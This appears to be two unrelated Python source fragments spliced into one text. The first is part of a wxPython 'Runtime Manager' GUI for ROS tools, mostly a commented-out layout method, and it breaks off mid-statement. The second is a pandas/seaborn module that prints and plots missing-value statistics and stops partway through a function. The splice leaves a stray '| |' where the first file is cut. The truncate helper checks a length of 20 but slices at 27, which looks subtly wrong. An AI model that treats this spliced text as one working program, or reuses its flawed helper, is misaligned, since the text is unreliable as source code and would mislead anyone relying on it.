self.Bind(wx.EVT_TOGGLEBUTTON, self.OnROSbagPlay, self.button_pause_rosbag_play)
self.Bind(wx.EVT_TOGGLEBUTTON, self.OnROSbagRecord, self.button_rosbag_simulation)
self.Bind(wx.EVT_TOGGLEBUTTON, self.OnLaunchKill, self.button_rviz_simulation)
self.Bind(wx.EVT_TOGGLEBUTTON, self.OnLaunchKill, self.button_rqt_simulation)
self.Bind(wx.EVT_TOGGLEBUTTON, self.OnLaunchKill, self.button_system_monitor)
def __set_properties(self):
# begin wxGlade: MyFrame.__set_properties
self.SetTitle(_("Runtime Manager"))
self.SetSize((806, 584))
self.button_stop_rosbag_play.Enable(False)
self.button_stop_rosbag_play.SetValue(1)
self.button_pause_rosbag_play.Enable(False)
self.label_rosbag_play_pos.SetMinSize((32, 17))
self.label_rosbag_play_total.SetMinSize((32, 17))
self.panel_5.SetScrollRate(10, 10)
def __do_layout(self):
pass
# # begin wxGlade: MyFrame.__do_layout
# self.sizer_1 = wx.BoxSizer(wx.VERTICAL)
# sizer_29 = wx.BoxSizer(wx.HORIZONTAL)
# self.sizer_cpuinfo = wx.BoxSizer(wx.HORIZONTAL)
# sizer_85_copy = wx.BoxSizer(wx.VERTICAL)
# sizer_51_copy_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_52_copy_1_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_60_copy_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_32 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_34 = wx.BoxSizer(wx.VERTICAL)
# self.sizer_36_staticbox.Lower()
# sizer_36 = wx.StaticBoxSizer(self.sizer_36_staticbox, wx.HORIZONTAL)
# sizer_topics_info = wx.BoxSizer(wx.VERTICAL)
# sizer_35 = wx.BoxSizer(wx.VERTICAL)
# self.sizer_topics_list = wx.BoxSizer(wx.VERTICAL)
# sizer_85 = wx.BoxSizer(wx.VERTICAL)
# sizer_51_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_52_copy_1 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_60_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_20 = wx.BoxSizer(wx.HORIZONTAL)
# self.sizer_stdout_staticbox.Lower()
# sizer_stdout = wx.StaticBoxSizer(self.sizer_stdout_staticbox, wx.VERTICAL)
# sizer_38 = wx.BoxSizer(wx.HORIZONTAL)
# self.sizer_87_staticbox.Lower()
# sizer_87 = wx.StaticBoxSizer(self.sizer_87_staticbox, wx.HORIZONTAL)
# self.sizer_86_staticbox.Lower()
# sizer_86 = wx.StaticBoxSizer(self.sizer_86_staticbox, wx.HORIZONTAL)
# sizer_19 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_78 = wx.BoxSizer(wx.VERTICAL)
# sizer_62_copy_copy_copy_copy_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_52_copy_copy_copy_copy_copy_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_37 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_80 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_82 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_83 = wx.BoxSizer(wx.VERTICAL)
# sizer_81 = wx.BoxSizer(wx.HORIZONTAL)
# self.sizer_79_staticbox.Lower()
# sizer_79 = wx.StaticBoxSizer(self.sizer_79_staticbox, wx.VERTICAL)
# sizer_10 = wx.BoxSizer(wx.VERTICAL)
# sizer_62_copy_copy_copy_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_52_copy_copy_copy_copy_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_11 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_17 = wx.BoxSizer(wx.VERTICAL)
# sizer_18 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_24 = wx.BoxSizer(wx.VERTICAL)
# sizer_62_copy_copy_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_52_copy_copy_copy_copy = wx.BoxSizer(wx.HORIZONTAL)
# self.sizer_26_staticbox.Lower()
# sizer_26 = wx.StaticBoxSizer(self.sizer_26_staticbox, wx.VERTICAL)
# sizer_77 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_66 = wx.BoxSizer(wx.VERTICAL)
# sizer_72 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_75 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_76_copy = wx.BoxSizer(wx.VERTICAL)
# sizer_54_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_76 = wx.BoxSizer(wx.VERTICAL)
# sizer_54 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_9 = wx.BoxSizer(wx.HORIZONTAL)
# self.sizer_12_staticbox.Lower()
# sizer_12 = wx.StaticBoxSizer(self.sizer_12_staticbox, wx.VERTICAL)
# self.sizer_25_staticbox.Lower()
# sizer_25 = wx.StaticBoxSizer(self.sizer_25_staticbox, wx.HORIZONTAL)
# sizer_71 = wx.BoxSizer(wx.VERTICAL)
# sizer_62_copy_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_52_copy_copy_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_47 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_27 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_68 = wx.BoxSizer(wx.VERTICAL)
# sizer_62_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_52_copy_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_5 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_7 = wx.BoxSizer(wx.VERTICAL)
# self.sizer_70_staticbox.Lower()
# sizer_70 = wx.StaticBoxSizer(self.sizer_70_staticbox, wx.VERTICAL)
# self.sizer_69_staticbox.Lower()
# sizer_69 = wx.StaticBoxSizer(self.sizer_69_staticbox, wx.VERTICAL)
# sizer_33 = wx.BoxSizer(wx.VERTICAL)
# sizer_4 = wx.BoxSizer(wx.VERTICAL)
# sizer_62 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_52_copy = wx.BoxSizer(wx.HORIZONTAL)
# self.sizer_39_staticbox.Lower()
# sizer_39 = wx.StaticBoxSizer(self.sizer_39_staticbox, wx.VERTICAL)
# sizer_53_copy_3_copy_2_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_53_copy_3_copy_2 = wx.BoxSizer(wx.HORIZONTAL)
# self.sizer_61_staticbox.Lower()
# sizer_61 = wx.StaticBoxSizer(self.sizer_61_staticbox, wx.VERTICAL)
# sizer_53_copy_3_copy_1 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_53_copy_4 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_8 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_64 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_53_copy_3_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_63 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_53_copy_3 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_40 = wx.BoxSizer(wx.VERTICAL)
# sizer_62_copy_copy_copy_1 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_52_copy_copy_copy_copy_1 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_46 = wx.BoxSizer(wx.VERTICAL)
# self.sizer_43_copy_staticbox.Lower()
# sizer_43_copy = wx.StaticBoxSizer(self.sizer_43_copy_staticbox, wx.HORIZONTAL)
# self.sizer_43_staticbox.Lower()
# sizer_43 = wx.StaticBoxSizer(self.sizer_43_staticbox, wx.HORIZONTAL)
# self.sizer_42_staticbox.Lower()
# sizer_42 = wx.StaticBoxSizer(self.sizer_42_staticbox, wx.HORIZONTAL)
# sizer_16 = wx.BoxSizer(wx.VERTICAL)
# sizer_51 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_52 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_60 = wx.BoxSizer(wx.HORIZONTAL)
# self.sizer_45_staticbox.Lower()
# sizer_45 = wx.StaticBoxSizer(self.sizer_45_staticbox, wx.VERTICAL)
# sizer_59 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_53_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_53_copy_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_53_copy_2_copy = wx.BoxSizer(wx.HORIZONTAL)
# sizer_53_copy_2 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_53_copy_1 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_53 = wx.BoxSizer(wx.HORIZONTAL)
# sizer_53.Add(self.button_map_qs, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_53.Add(self.panel_map_qs, 1, wx.ALIGN_CENTER_VERTICAL, 0)
# sizer_53.Add(self.label_map_qs, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_45.Add(sizer_53, 1, wx.EXPAND, 0)
# sizer_53_copy_1.Add(self.button_sensing_qs, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_53_copy_1.Add(self.panel_sensing_qs, 1, wx.ALIGN_CENTER_VERTICAL, 0)
# sizer_53_copy_1.Add(self.label_sensing_qs, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_45.Add(sizer_53_copy_1, 1, wx.EXPAND, 0)
# sizer_53_copy_2.Add(self.button_localization_qs, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_53_copy_2.Add(self.panel_localization_qs, 1, wx.ALIGN_CENTER_VERTICAL, 0)
# sizer_53_copy_2.Add(self.label_localization_qs, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_45.Add(sizer_53_copy_2, 1, wx.EXPAND, 0)
# sizer_53_copy_2_copy.Add(self.button_detection_qs, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_53_copy_2_copy.Add(self.panel_detection_qs, 1, wx.ALIGN_CENTER_VERTICAL, 0)
# sizer_53_copy_2_copy.Add(self.label_detection_qs, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_45.Add(sizer_53_copy_2_copy, 1, wx.EXPAND, 0)
# sizer_53_copy_copy.Add(self.button_mission_planning_qs, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_53_copy_copy.Add(self.panel_mission_planning_qs, 1, wx.ALIGN_CENTER_VERTICAL, 0)
# sizer_53_copy_copy.Add(self.label_mission_planning_qs, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_45.Add(sizer_53_copy_copy, 1, wx.EXPAND, 0)
# sizer_53_copy.Add(self.button_motion_planning_qs, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_53_copy.Add(self.panel_motion_planning_qs, 1, wx.ALIGN_CENTER_VERTICAL, 0)
# sizer_53_copy.Add(self.label_motion_planning_qs, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_45.Add(sizer_53_copy, 1, wx.EXPAND, 0)
# sizer_59.Add(self.button_android_tablet_qs, 1, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_59.Add(self.button_oculus_rift_qs, 1, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_59.Add(self.button_vehicle_gateway_qs, 1, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_59.Add(self.button_cloud_data_qs, 1, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_45.Add(sizer_59, 1, wx.EXPAND, 0)
# sizer_16.Add(sizer_45, 1, wx.ALL | wx.EXPAND, 4)
# sizer_60.Add(self.button_auto_pilot_qs, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_51.Add(sizer_60, 1, wx.EXPAND, 0)
# sizer_52.Add(self.button_rosbag_qs, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_52.Add(self.button_rviz_qs, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_52.Add(self.button_rqt_qs, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_51.Add(sizer_52, 0, wx.EXPAND, 0)
# sizer_16.Add(sizer_51, 0, wx.EXPAND, 0)
# self.tab_qs.SetSizer(sizer_16)
# sizer_46.Add(self.radio_box_localizer, 0, wx.ALL, 4)
# sizer_42.Add(self.button_setup_tf, 0, wx.ALL, 4)
# sizer_42.Add(self.panel_setup_tf, 1, wx.ALL, 4)
# sizer_46.Add(sizer_42, 0, wx.ALL | wx.EXPAND, 4)
# sizer_43.Add(self.button_vehicle_model, 0, wx.ALL, 4)
# sizer_43.Add(self.panel_vehicle_model, 1, wx.ALL, 4)
# sizer_46.Add(sizer_43, 0, wx.ALL | wx.EXPAND, 4)
# sizer_43_copy.Add(self.button_vehicle_info, 0, wx.ALL, 4)
# sizer_43_copy.Add(self.panel_vehicle_info, 1, wx.ALL, 4)
# sizer_46.Add(sizer_43_copy, 0, wx.ALL | wx.EXPAND, 10)
# sizer_40.Add(sizer_46, 1, wx.EXPAND, 0)
# sizer_62_copy_copy_copy_1.Add((20, 20), 1, 0, 0)
# sizer_52_copy_copy_copy_copy_1.Add(self.button_rosbag_setup, 0, wx.ALL, 4)
# sizer_52_copy_copy_copy_copy_1.Add(self.button_rviz_setup, 0, wx.ALL, 4)
# sizer_52_copy_copy_copy_copy_1.Add(self.button_rqt_setup, 0, wx.ALL, 4)
# sizer_62_copy_copy_copy_1.Add(sizer_52_copy_copy_copy_copy_1, 0, wx.EXPAND, 0)
# sizer_40.Add(sizer_62_copy_copy_copy_1, 0, wx.EXPAND, 0)
# self.tab_setup.SetSizer(sizer_40)
# sizer_53_copy_3.Add(self.button_point_cloud, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_53_copy_3.Add(self.panel_point_cloud, 1, wx.ALIGN_CENTER_VERTICAL, 0)
# sizer_63.Add(sizer_53_copy_3, 1, wx.EXPAND, 0)
# sizer_61.Add(sizer_63, 0, wx.TOP | wx.EXPAND, 4)
# sizer_64.Add(self.checkbox_auto_update, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_64.Add(self.choice_scene_num, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_53_copy_3_copy.Add(self.button_area_lists, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_53_copy_3_copy.Add(self.label_9, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_53_copy_3_copy.Add(self.panel_area_lists, 1, wx.ALIGN_CENTER_VERTICAL, 0)
# sizer_64.Add(sizer_53_copy_3_copy, 1, wx.BOTTOM | wx.EXPAND, 4)
# sizer_61.Add(sizer_64, 0, wx.BOTTOM | wx.EXPAND, 4)
# sizer_8.Add(self.label_point_cloud_bar, 1, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_8.Add(self.label_point_cloud, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_61.Add(sizer_8, 1, wx.ALL | wx.EXPAND, 4)
# sizer_61.Add(self.static_line_4, 0, wx.TOP | wx.BOTTOM | wx.EXPAND, 4)
# sizer_53_copy_4.Add(self.button_vector_map, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_53_copy_4.Add(self.panel_vector_map, 1, wx.ALIGN_CENTER_VERTICAL, 0)
# sizer_61.Add(sizer_53_copy_4, 0, wx.TOP | wx.BOTTOM | wx.EXPAND, 4)
# sizer_61.Add(self.static_line_5, 0, wx.TOP | wx.BOTTOM | wx.EXPAND, 4)
# sizer_53_copy_3_copy_1.Add(self.button_tf, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_53_copy_3_copy_1.Add(self.panel_tf, 1, wx.ALIGN_CENTER_VERTICAL, 0)
# sizer_61.Add(sizer_53_copy_3_copy_1, 0, wx.TOP | wx.BOTTOM | wx.EXPAND, 4)
# sizer_4.Add(sizer_61, 0, wx.ALL | wx.EXPAND, 4)
# sizer_53_copy_3_copy_2.Add(self.button_pcd_filter, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_53_copy_3_copy_2.Add(self.panel_pcd_filter, 1, wx.ALIGN_CENTER_VERTICAL, 0)
# sizer_39.Add(sizer_53_copy_3_copy_2, 0, wx.EXPAND, 0)
# sizer_39.Add(self.static_line_5_copy, 0, wx.TOP | wx.BOTTOM | wx.EXPAND, 4)
# sizer_53_copy_3_copy_2_copy.Add(self.button_pcd_binarizer, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_53_copy_3_copy_2_copy.Add(self.panel_pcd_binarizer, 1, wx.ALIGN_CENTER_VERTICAL, 0)
# sizer_39.Add(sizer_53_copy_3_copy_2_copy, 0, wx.EXPAND, 0)
# sizer_4.Add(sizer_39, 0, wx.LEFT | wx.RIGHT | wx.EXPAND, 4)
# sizer_62.Add((20, 20), 1, 0, 0)
# sizer_52_copy.Add(self.button_rosbag_map, 0, wx.ALL, 4)
# sizer_52_copy.Add(self.button_rviz_map, 0, wx.ALL, 4)
# sizer_52_copy.Add(self.button_rqt_map, 0, wx.ALL, 4)
# sizer_62.Add(sizer_52_copy, 0, wx.EXPAND, 0)
# sizer_4.Add(sizer_62, 0, wx.EXPAND, 0)
# self.tab_map.SetSizer(sizer_4)
# sizer_33.Add(self.panel_sensing, 1, wx.EXPAND, 0)
# sizer_5.Add(sizer_33, 1, wx.ALL | wx.EXPAND, 4)
# sizer_7.Add(self.tree_ctrl_sense, 2, wx.EXPAND, 0)
# sizer_69.Add(self.button_calibration_toolkit, 1, wx.ALL | wx.EXPAND | wx.ALIGN_CENTER_HORIZONTAL, 4)
# sizer_69.Add(self.button_calibration_publisher, 1, wx.ALL | wx.EXPAND | wx.ALIGN_CENTER_HORIZONTAL, 4)
# sizer_7.Add(sizer_69, 2, wx.TOP | wx.EXPAND, 8)
# sizer_70.Add(self.button_points_image, 1, wx.ALL | wx.EXPAND | wx.ALIGN_CENTER_HORIZONTAL, 4)
# sizer_70.Add(self.button_virtual_scan_image, 1, wx.ALL | wx.EXPAND | wx.ALIGN_CENTER_HORIZONTAL, 4)
# sizer_70.Add(self.button_scan_image, 1, wx.ALL | wx.EXPAND | wx.ALIGN_CENTER_HORIZONTAL, 4)
# sizer_7.Add(sizer_70, 3, wx.TOP | wx.BOTTOM | wx.EXPAND, 8)
# sizer_5.Add(sizer_7, 1, wx.ALL | wx.EXPAND, 4)
# sizer_68.Add(sizer_5, 1, wx.EXPAND, 0)
# sizer_62_copy.Add((20, 20), 1, 0, 0)
# sizer_52_copy_copy.Add(self.button_rosbag_sensing, 0, wx.ALL, 4)
# sizer_52_copy_copy.Add(self.button_rviz_sensing, 0, wx.ALL, 4)
# sizer_52_copy_copy.Add(self.button_rqt_sensing, 0, wx.ALL, 4)
# sizer_62_copy.Add(sizer_52_copy_copy, 0, wx.EXPAND, 0)
# sizer_68.Add(sizer_62_copy, 0, wx.EXPAND, 0)
# self.tab_sensing.SetSizer(sizer_68)
# sizer_27.Add(self.tree_ctrl_0, 1, wx.EXPAND, 0)
# sizer_27.Add(self.tree_ctrl_1, 1, wx.EXPAND, 0)
# sizer_71.Add(sizer_27, 1, wx.EXPAND, 0)
# sizer_47.Add(self.button_synchronization, 0, wx.ALL, 4)
# sizer_62_copy_copy.Add(sizer_47, 1, wx.EXPAND, 0)
# sizer_52_copy_copy_copy.Add(self.button_rosbag_computing, 0, wx.ALL, 4)
# sizer_52_copy_copy_copy.Add(self.button_rviz_computing, 0, wx.ALL, 4)
# sizer_52_copy_copy_copy.Add(self.button_rqt_computing, 0, wx.ALL, 4)
# sizer_62_copy_copy.Add(sizer_52_copy_copy_copy, 0, wx.EXPAND, 0)
# sizer_71.Add(sizer_62_copy_copy, 0, wx.EXPAND, 0)
# self.tab_computing.SetSizer(sizer_71)
# sizer_25.Add(self.button_android_tablet_interface, 1, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_25.Add(self.button_oculus_rift_interface, 1, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_25.Add(self.button_vehicle_gateway_interface, 1, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_9.Add(sizer_25, 3, wx.ALL | wx.EXPAND, 4)
# sizer_12.Add(self.checkbox_sound, 1, wx.ALL | wx.ALIGN_CENTER_HORIZONTAL, 4)
# sizer_9.Add(sizer_12, 1, wx.ALL | wx.EXPAND, 4)
# sizer_24.Add(sizer_9, 1, wx.EXPAND, 0)
# sizer_72.Add(self.button_auto_pilot_interface, 1, wx.ALL | wx.EXPAND, 4)
# sizer_75.Add((20, 20), 1, 0, 0)
# sizer_76.Add(self.label_5, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_54.Add(self.button_statchk_lamp_l, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_54.Add(self.button_statchk_lamp_r, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_76.Add(sizer_54, 1, wx.EXPAND, 0)
# sizer_75.Add(sizer_76, 1, 0, 0)
# sizer_76_copy.Add(self.label_5_copy, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_54_copy.Add(self.button_statchk_indi_l, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_54_copy.Add(self.button_statchk_indi_r, 0, wx.ALL | wx.ALIGN_CENTER_VERTICAL, 4)
# sizer_76_copy.Add(sizer_54_copy, 1, wx.EXPAND, 0)
# sizer_75.Add(sizer_76_copy, 1, 0, 0)
# sizer_75.Add((20, 20), 1, 0, 0)
# sizer_72.Add(sizer_75, 1, 0, 0)
# sizer_26.Add(sizer_72, 0, wx.EXPAND, 0)
# sizer_66.Add(self.button_statchk_d, 0, wx.ALL | wx.EXPAND, 4)
# sizer_66.Add(self.button_statchk_r, 0, wx.ALL | wx.EXPAND, 4)
# sizer_66.Add(self.button_statchk_b, 0, wx.ALL | wx.EXPAND, 4)
# sizer_66.Add(self.button_statchk_n, 0, wx.ALL | wx.EXPAND, 4)
# sizer_77.Add(sizer_66, 0, wx.ALL | wx.EXPAND, 4)
# sizer_77.Add(self.panel_interface_cc, 1, wx.ALL, 4)
# sizer_26.Add(sizer_77, 0, wx.EXPAND, 0)
# sizer_24.Add(sizer_26, 0, wx.ALL | wx.EXPAND, 4)
# sizer_24.Add((20, 20), 1, 0, 0)
# sizer_62_copy_copy_copy.Add((20, 20), 1, 0, 0)
# sizer_52_copy_copy_copy_copy.Add(self.button_rosbag_interface, 0, wx.ALL, 4)
# sizer_52_copy_copy_copy_copy.Add(self.button_rviz_interface, 0, wx.ALL, 4)
# sizer_52_copy_copy_copy_copy.Add(self.button_rqt_interface, 0, wx.ALL, 4)
# sizer_62_copy_copy_copy.Add(sizer_52_copy_copy_copy_copy, 0, wx.EXPAND, 0)
# sizer_24.Add(sizer_62_copy_copy_copy, 0, wx.EXPAND, 0)
# self.tab_interface.SetSizer(sizer_24)
# sizer_11.Add(self.tree_ctrl_data, 1, wx.ALL | wx.EXPAND, 4)
# sizer_18.Add(self.text_ctrl_query, | |
"""Plot statistis about missing values from given indicators."""
import matplotlib
import seaborn as sns
import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
import matplotlib.ticker as ticker
from mpl_toolkits.axes_grid1.parasite_axes import SubplotHost
# Plot functions: each indicator has a different way of being plotted
def plot_global(indicators, plot=False, show=True, ax=None):
"""Plot statistics on the full database."""
# Get required indicators
df = indicators['global']
n_rows = df.at[0, 'n_rows']
n_cols = df.at[0, 'n_cols']
n_values = df.at[0, 'n_values']
n_mv = df.at[0, 'n_mv']
n_mv1 = df.at[0, 'n_mv1']
n_mv2 = df.at[0, 'n_mv2']
n_not_mv = df.at[0, 'n_not_mv']
f_mv = df.at[0, 'f_mv']
f_mv1 = df.at[0, 'f_mv1']
f_mv2 = df.at[0, 'f_mv2']
f_not_mv = df.at[0, 'f_not_mv']
# Print these statistics
if show:
print(
f'\n'
f'Statistics on the full data frame:\n'
f'---------------------------------\n'
f'[{n_rows} rows x {n_cols} columns]\n'
f'{n_values} values\n'
f'N NMV: {f_not_mv:.1f}% or {n_not_mv}\n'
f'N MV: {f_mv:.1f}% or {n_mv}\n'
f' N MV 1: {f_mv1:.1f}% or {n_mv1}\n'
f' N MV 2: {f_mv2:.1f}% or {n_mv2}\n'
)
# If asked, plot these statistics
if plot:
if ax is None:
_, ax = plt.subplots(figsize=(10, 4))
df_show = pd.DataFrame({
'MV1': [n_mv1],
'MV2': [n_mv2],
'MV': [n_mv],
'V': [n_values],
'type': ['Full data frame']
})
sns.set_color_codes('pastel')
sns.barplot(x='V', y='type', data=df_show, color='lightgray', ax=ax,
label=f'Not missing ({f_not_mv:.1f}%)')
sns.set_color_codes('muted')
sns.barplot(x='MV', y='type', data=df_show, color='b', ax=ax,
label=f'Missing - Not applicable ({f_mv1:.1f}%)')
sns.set_color_codes('dark')
sns.barplot(x='MV2', y='type', data=df_show, color='b', ax=ax,
label=f'Missing - Not available ({f_mv2:.1f}%)')
box = ax.get_position()
ax.set_position([box.x0, box.y0, box.width * 0.5, box.height*0.5])
ax.legend(ncol=1, loc='center left', frameon=True,
title='Type of values',
bbox_to_anchor=(1.05, 0.5))
ax.set(ylabel='', xlabel=f'Number of values (Total {n_values})')
ax.set_title('Proportion of missing values')
sns.despine(left=True, bottom=True, ax=ax)
# Remove y labels
ax.tick_params(axis='y', which='both', left=False, labelleft=False)
def plot_features(indicators, plot=False, show=True, ax=None):
"""Plot the number of features with missing values."""
# Get required indicators
df = pd.concat([indicators['features'], indicators['global']], axis=1)
n_f_w_mv = df.at[0, 'n_f_w_mv']
n_f_w_mv1_o = df.at[0, 'n_f_w_mv1_o']
n_f_w_mv2_o = df.at[0, 'n_f_w_mv2_o']
n_f_w_mv_1a2 = df.at[0, 'n_f_w_mv_1a2']
n_f_wo_mv = df.at[0, 'n_f_wo_mv']
f_f_w_mv = df.at[0, 'f_f_w_mv']
f_f_w_mv1_o = df.at[0, 'f_f_w_mv1_o']
f_f_w_mv2_o = df.at[0, 'f_f_w_mv2_o']
f_f_w_mv_1a2 = df.at[0, 'f_f_w_mv_1a2']
f_f_wo_mv = df.at[0, 'f_f_wo_mv']
n_cols = df.at[0, 'n_cols']
if show:
print(
f'\n'
f'Statistics on features:\n'
f'-----------------------\n'
f'N features: {n_cols}\n'
f'N features with MV: {n_f_w_mv} ({f_f_w_mv:.1f}%)\n'
f' N features with MV1 only: {n_f_w_mv1_o} ({f_f_w_mv1_o:.1f}%)\n'
f' N features with MV2 only: {n_f_w_mv2_o} ({f_f_w_mv2_o:.1f}%)\n'
f' N features with MV1 and MV2: {n_f_w_mv_1a2} ({f_f_w_mv_1a2:.1f}%)\n'
)
if plot:
# Plot proportion of features with missing values
df_show = pd.DataFrame({
'N MV': [n_f_w_mv],
'N MV1 only': [n_f_w_mv1_o],
'N MV2 only': [n_f_w_mv2_o],
'N MV 1 xor 2': [n_f_w_mv1_o + n_f_w_mv2_o],
'N F': [n_cols],
'type': ['Full data frame']
})
if ax is None:
_, ax = plt.subplots(figsize=(10, 4))
sns.set_color_codes('pastel')
sns.barplot(x='N F', y='type', data=df_show, color='lightgray', ax=ax,
label=f'No missing values ({n_f_wo_mv} • {f_f_wo_mv:.1f}%)')
sns.set_color_codes('pastel')
sns.barplot(x='N MV', y='type', data=df_show, color='g', ax=ax,
label=f'Not applicable and not available ({n_f_w_mv_1a2} • {f_f_w_mv_1a2:.1f}%)')
sns.set_color_codes('muted')
sns.barplot(x='N MV 1 xor 2', y='type', data=df_show, color='g', ax=ax,
label=f'Not applicable only ({n_f_w_mv1_o} • {f_f_w_mv1_o:.1f}%)')
sns.set_color_codes('dark')
sns.barplot(x='N MV2 only', y='type', data=df_show, color='g', ax=ax,
label=f'Not available only ({n_f_w_mv2_o} • {f_f_w_mv2_o:.1f}%)')
box = ax.get_position()
ax.set_position([box.x0, box.y0, box.width * 0.5, box.height*0.5])
ax.legend(ncol=1, loc='center left', frameon=True,
title='Type of missing values contained in the feature',
bbox_to_anchor=(1.05, 0.5))
ax.set(ylabel='', xlabel=f'Number of features (Total {n_cols})')
ax.set_title('Proportion of features having missing values')
sns.despine(left=True, bottom=True, ax=ax)
# Remove y labels
ax.tick_params(axis='y', which='both', left=False, labelleft=False)
def plot_feature_wise(indicators, plot=False, show=True, ax=None, nf_max=40):
"""Plot the statistics feature-wise."""
n_mv_fw = indicators['feature-wise']
n_rows = indicators['global'].at[0, 'n_rows']
if show:
with pd.option_context('display.max_rows', None):
print(
f'\n'
f'Statistics feature-wise:\n'
f'------------------------\n'
f'\n'
f'{n_mv_fw}'
)
if plot:
# Plot proportion of missing values in each feature
# Copy index in a column for the barplot method
n_mv_fw['feature'] = n_mv_fw.index
n_mv_fw['feature_shortened'] = n_mv_fw['id'].astype(str) + ': ' + n_mv_fw.index
# Truncate
if n_mv_fw.shape[0] <= nf_max:
def truncate(string):
if len(string) <= 20:
return string
return string[:27]+'...'
n_mv_fw['feature_shortened'] = n_mv_fw['feature_shortened'].apply(truncate)
# Add the total number of values for each feature
n_mv_fw['N V'] = n_rows
# Get rid of the features with no missing values
n_mv_fw_l = n_mv_fw[(n_mv_fw['N MV1'] != 0) | (n_mv_fw['N MV2'] != 0)]
n_mv_fw_l = n_mv_fw_l.head(20)
if ax is None:
fig, ax = plt.subplots(figsize=(10, 8))
else:
fig = plt.gcf()
if n_mv_fw_l.empty:
return fig, ax
